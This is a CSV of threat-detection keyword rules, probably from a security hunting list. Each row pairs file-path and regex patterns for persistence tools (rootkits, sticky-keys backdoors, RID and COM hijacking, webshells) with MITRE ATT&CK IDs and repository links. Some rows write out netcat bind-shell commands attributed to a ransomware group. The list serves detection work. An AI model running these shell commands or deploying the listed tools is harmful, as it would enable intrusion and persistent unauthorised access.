"*\backdoor_new.bat*",".{0,1000}\\backdoor_new\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\bin\Release\SchTask.exe*",".{0,1000}\\bin\\Release\\SchTask\.exe.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*\browserhistory.csv*",".{0,1000}\\browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\browsinghistoryview\browsinghistoryview64.exe*",".{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*\chromepasswordlist.csv*",".{0,1000}\\chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\chromepasswords.py*",".{0,1000}\\chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\COM-Hunter.csproj*",".{0,1000}\\COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*\COM-Hunter.exe*",".{0,1000}\\COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*\COM-Hunter.sln*",".{0,1000}\\COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*\COM-Object-hijacking-master*",".{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","57","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z"
"*\CreateService-master\*",".{0,1000}\\CreateService\-master\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*\CreateService-master\CreateService\*",".{0,1000}\\CreateService\-master\\CreateService\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*\Cronos Rootkit.sln*",".{0,1000}\\Cronos\sRootkit\.sln.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*\Cronos Rootkit\*",".{0,1000}\\Cronos\sRootkit\\.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*\CronosDebugger.vcxproj*",".{0,1000}\\CronosDebugger\.vcxproj.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*\Cronos-x64.zip*",".{0,1000}\\Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*\Data\WinAuditDB.mdb*",".{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*\doucme.csproj*",".{0,1000}\\doucme\.csproj.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*\doucme.exe*",".{0,1000}\\doucme\.exe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*\doucme.sln*",".{0,1000}\\doucme\.sln.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*\ext_hijacker.h*",".{0,1000}\\ext_hijacker\.h.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*\hidden-cmd.bat*",".{0,1000}\\hidden\-cmd\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\hijacker_app\src\ProxyApp.exe*",".{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*\ImplantSSP.exe*",".{0,1000}\\ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*\InstallShellcode.exe*",".{0,1000}\\InstallShellcode\.exe.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\Invoke-mimikittenz.ps1*",".{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\JunctionFolder.csproj*",".{0,1000}\\JunctionFolder\.csproj.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*\logon_backdoor\*",".{0,1000}\\logon_backdoor\\.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\logon_backdoor-master*",".{0,1000}\\logon_backdoor\-master.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\nc.exe -Ldp * -e cmd.exe*",".{0,1000}\\nc\.exe\s\-Ldp\s.{0,1000}\s\-e\scmd\.exe.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe -i *",".{0,1000}\\nc64\.exe\s\-i\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe -i*",".{0,1000}\\nc64\.exe\s\-i.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe -lvp *",".{0,1000}\\nc64\.exe\s\-lvp\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe -zv *",".{0,1000}\\nc64\.exe\s\-zv\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe"" -i *",".{0,1000}\\nc64\.exe\""\s\-i\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe"" -lvp *",".{0,1000}\\nc64\.exe\""\s\-lvp\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nc64.exe"" -zv *",".{0,1000}\\nc64\.exe\""\s\-zv\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ncat* -e cmd.exe --keep-open*",".{0,1000}\\ncat.{0,1000}\s\-e\scmd\.exe\s\-\-keep\-open.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\netshlep.cpp*",".{0,1000}\\netshlep\.cpp.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*\oem\Desktop\backdoor*",".{0,1000}\\oem\\Desktop\\backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\Offensive-Netsh-Helper\*",".{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*\Offensive-Netsh-Helper-master*",".{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*\OfficePersistence.ps1*",".{0,1000}\\OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*\persistence\elevated\rid_hijack*",".{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*\persistence_demos-master*",".{0,1000}\\persistence_demos\-master.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","",""
"*\pipe\$77control*",".{0,1000}\\pipe\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\PoshADCS-master*",".{0,1000}\\PoshADCS\-master.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*\PowerLurk.ps1*",".{0,1000}\\PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*\PowerLurk-main*",".{0,1000}\\PowerLurk\-main.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*\Process Hacker 2\*",".{0,1000}\\Process\sHacker\s2\\.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\PSprofile.exe*",".{0,1000}\\PSprofile\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*\r77config.c*",".{0,1000}\\r77config\.c.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\r77-rootkit\*",".{0,1000}\\r77\-rootkit\\.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\r77-x64.dll*",".{0,1000}\\r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\r77-x86.dll*",".{0,1000}\\r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\RedPersist.exe*",".{0,1000}\\RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*\RedPersist.pdb*",".{0,1000}\\RedPersist\.pdb.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*\RedPersist.sln*",".{0,1000}\\RedPersist\.sln.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*\RedPersist-main\*",".{0,1000}\\RedPersist\-main\\.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*\rid_hijack.rb*",".{0,1000}\\rid_hijack\.rb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*\RID-Hijacking\*",".{0,1000}\\RID\-Hijacking\\.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*\RID-Hijacking-master*",".{0,1000}\\RID\-Hijacking\-master.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*\Rootkit.cpp*",".{0,1000}\\Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
